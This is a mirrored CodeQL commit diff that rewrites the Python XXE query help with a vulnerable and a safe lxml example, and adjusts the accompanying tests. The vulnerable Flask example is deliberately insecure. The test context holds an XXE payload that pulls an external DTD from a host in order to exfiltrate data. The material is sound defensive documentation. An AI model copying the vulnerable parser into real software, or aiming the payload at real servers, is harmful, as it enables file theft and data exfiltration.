mirror of
https://github.com/github/codeql.git
synced 2026-04-29 18:55:14 +02:00
Python: Adjust XXE qhelp
and remove the old copy, we don't need it anymore :)
This commit is contained in:
committed by
Rasmus Wriedt Larsen
parent
c365337867
commit
b00766b054
@@ -15,29 +15,34 @@ and out-of-band data retrieval techniques may allow attackers to steal sensitive
|
||||
<p>
|
||||
The easiest way to prevent XXE attacks is to disable external entity handling when
|
||||
parsing untrusted data. How this is done depends on the library being used. Note that some
|
||||
libraries, such as recent versions of <code>libxml</code>, disable entity expansion by default,
|
||||
libraries, such as recent versions of the XML libraries in the standard library of Python 3,
|
||||
disable entity expansion by default,
|
||||
so unless you have explicitly enabled entity expansion, no further action needs to be taken.
|
||||
</p>
|
||||
|
||||
<p>
|
||||
We recommend using the <a href="https://pypi.org/project/defusedxml/">defusedxml</a>
|
||||
PyPI package, which has been created to prevent XML attacks (both XXE and XML bombs).
|
||||
</p>
|
||||
</recommendation>
|
||||
|
||||
<example>
|
||||
<p>
|
||||
The following example uses the <code>libxml</code> XML parser to parse a string <code>xmlSrc</code>.
|
||||
If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since
|
||||
the parser is invoked with the <code>noent</code> option set to <code>true</code>:
|
||||
The following example uses the <code>lxml</code> XML parser to parse a string
|
||||
<code>xml_src</code>. That string is from an untrusted source, so this code is
|
||||
vulnerable to an XXE attack, since the <a href="https://lxml.de/apidoc/lxml.etree.html#lxml.etree.XMLParser">
|
||||
default parser</a> from <code>lxml.etree</code> allows local external entities to be resolved.
|
||||
</p>
|
||||
<sample src="examples/Xxe.js"/>
|
||||
<sample src="examples/XxeBad.py"/>
|
||||
|
||||
<p>
|
||||
To guard against XXE attacks, the <code>noent</code> option should be omitted or set to
|
||||
<code>false</code>. This means that no entity expansion is undertaken at all, not even for standard
|
||||
internal entities such as <code>&amp;</code> or <code>&gt;</code>. If desired, these
|
||||
entities can be expanded in a separate step using utility functions provided by libraries such
|
||||
as <a href="http://underscorejs.org/#unescape">underscore</a>,
|
||||
<a href="https://lodash.com/docs/4.17.15#unescape">lodash</a> or
|
||||
<a href="https://github.com/mathiasbynens/he">he</a>.
|
||||
To guard against XXE attacks with the <code>lxml</code> library, you should create a
|
||||
parser with <code>resolve_entities</code> set to <code>false</code>. This means that no
|
||||
entity expansion is undertaken, althuogh standard predefined entities such as
|
||||
<code>&gt;</code>, for writing <code>></code> inside the text of an XML element,
|
||||
are still allowed.
|
||||
</p>
|
||||
<sample src="examples/XxeGood.js"/>
|
||||
<sample src="examples/XxeGood.py"/>
|
||||
</example>
|
||||
|
||||
<references>
|
||||
@@ -53,5 +58,13 @@ Timothy Morgen:
|
||||
Timur Yunusov, Alexey Osipov:
|
||||
<a href="https://www.slideshare.net/qqlan/bh-ready-v4">XML Out-Of-Band Data Retrieval</a>.
|
||||
</li>
|
||||
<li>
|
||||
Python 3 standard library:
|
||||
<a href="https://docs.python.org/3/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.
|
||||
</li>
|
||||
<li>
|
||||
Python 2 standard library:
|
||||
<a href="https://docs.python.org/2/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.
|
||||
</li>
|
||||
</references>
|
||||
</qhelp>
|
||||
|
||||
@@ -1,7 +0,0 @@
|
||||
const app = require("express")(),
|
||||
libxml = require("libxmljs");
|
||||
|
||||
app.post("upload", (req, res) => {
|
||||
let xmlSrc = req.body,
|
||||
doc = libxml.parseXml(xmlSrc, { noent: true });
|
||||
});
|
||||
@@ -0,0 +1,10 @@
|
||||
from flask import Flask, request
|
||||
import lxml.etree
|
||||
|
||||
app = Flask(__name__)
|
||||
|
||||
@app.post("/upload")
|
||||
def upload():
|
||||
xml_src = request.get_data()
|
||||
doc = lxml.etree.fromstring(xml_src)
|
||||
return lxml.etree.tostring(doc)
|
||||
@@ -1,7 +0,0 @@
|
||||
const app = require("express")(),
|
||||
libxml = require("libxmljs");
|
||||
|
||||
app.post("upload", (req, res) => {
|
||||
let xmlSrc = req.body,
|
||||
doc = libxml.parseXml(xmlSrc);
|
||||
});
|
||||
@@ -0,0 +1,11 @@
|
||||
from flask import Flask, request
|
||||
import lxml.etree
|
||||
|
||||
app = Flask(__name__)
|
||||
|
||||
@app.post("/upload")
|
||||
def upload():
|
||||
xml_src = request.get_data()
|
||||
parser = lxml.etree.XMLParser(resolve_entities=False)
|
||||
doc = lxml.etree.fromstring(xml_src, parser=parser)
|
||||
return lxml.etree.tostring(doc)
|
||||
@@ -1,48 +0,0 @@
|
||||
<!DOCTYPE qhelp PUBLIC
|
||||
"-//Semmle//qhelp//EN"
|
||||
"qhelp.dtd">
|
||||
<qhelp>
|
||||
|
||||
<overview>
|
||||
<p>
|
||||
Parsing untrusted XML files with a weakly configured XML parser may lead to attacks such as XML External Entity (XXE),
|
||||
Billion Laughs, Quadratic Blowup and DTD retrieval.
|
||||
This type of attack uses external entity references to access arbitrary files on a system, carry out denial of
|
||||
service, or server side request forgery. Even when the result of parsing is not returned to the user, out-of-band
|
||||
data retrieval techniques may allow attackers to steal sensitive data. Denial of services can also be carried out
|
||||
in this situation.
|
||||
</p>
|
||||
</overview>
|
||||
|
||||
<recommendation>
|
||||
<p>
|
||||
Use <a href="https://pypi.org/project/defusedxml/">defusedxml</a>, a Python package aimed
|
||||
to prevent any potentially malicious operation.
|
||||
</p>
|
||||
</recommendation>
|
||||
|
||||
<example>
|
||||
<p>
|
||||
The following example calls <code>xml.etree.ElementTree.fromstring</code> using a parser (<code>lxml.etree.XMLParser</code>)
|
||||
that is not safely configured on untrusted data, and is therefore inherently unsafe.
|
||||
</p>
|
||||
<sample src="XmlEntityInjection.py"/>
|
||||
<p>
|
||||
Providing an input (<code>xml_content</code>) like the following XML content against /bad, the request response would contain the contents of
|
||||
<code>/etc/passwd</code>.
|
||||
</p>
|
||||
<sample src="XXE.xml"/>
|
||||
</example>
|
||||
|
||||
<references>
|
||||
<li>Python 3 <a href="https://docs.python.org/3/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.</li>
|
||||
<li>Python 2 <a href="https://docs.python.org/2/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.</li>
|
||||
<li>Python <a href="https://www.edureka.co/blog/python-xml-parser-tutorial/">XML Parsing</a>.</li>
|
||||
<li>OWASP vulnerability description: <a href="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing">XML External Entity (XXE) Processing</a>.</li>
|
||||
<li>OWASP guidance on parsing xml files: <a href="https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#python">XXE Prevention Cheat Sheet</a>.</li>
|
||||
<li>Paper by Timothy Morgen: <a href="https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/">XML Schema, DTD, and Entity Attacks</a></li>
|
||||
<li>Out-of-band data retrieval: Timur Yunusov & Alexey Osipov, Black hat EU 2013: <a href="https://www.slideshare.net/qqlan/bh-ready-v4">XML Out-Of-Band Data Retrieval</a>.</li>
|
||||
<li>Denial of service attack (Billion laughs): <a href="https://en.wikipedia.org/wiki/Billion_laughs">Billion Laughs.</a></li>
|
||||
</references>
|
||||
|
||||
</qhelp>
|
||||
@@ -74,6 +74,10 @@ exfiltrate_through_dtd_retrieval = f"""<?xml version="1.0"?>
|
||||
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://{HOST}:{PORT}/exfiltrate-through.dtd"> %xxe; ]>
|
||||
"""
|
||||
|
||||
predefined_entity_xml = """<?xml version="1.0"?>
|
||||
<test><</test>
|
||||
"""
|
||||
|
||||
# ==============================================================================
|
||||
# other setup
|
||||
|
||||
@@ -443,6 +447,13 @@ class TestLxml:
|
||||
|
||||
assert exfiltrated_data == "SECRET_FLAG"
|
||||
|
||||
@staticmethod
|
||||
def test_predefined_entity():
|
||||
parser = lxml.etree.XMLParser(resolve_entities=False)
|
||||
root = lxml.etree.fromstring(predefined_entity_xml, parser=parser)
|
||||
assert root.tag == "test"
|
||||
assert root.text == "<"
|
||||
|
||||
# ==============================================================================
|
||||
|
||||
import xmltodict
|
||||
|
||||
Reference in New Issue
Block a user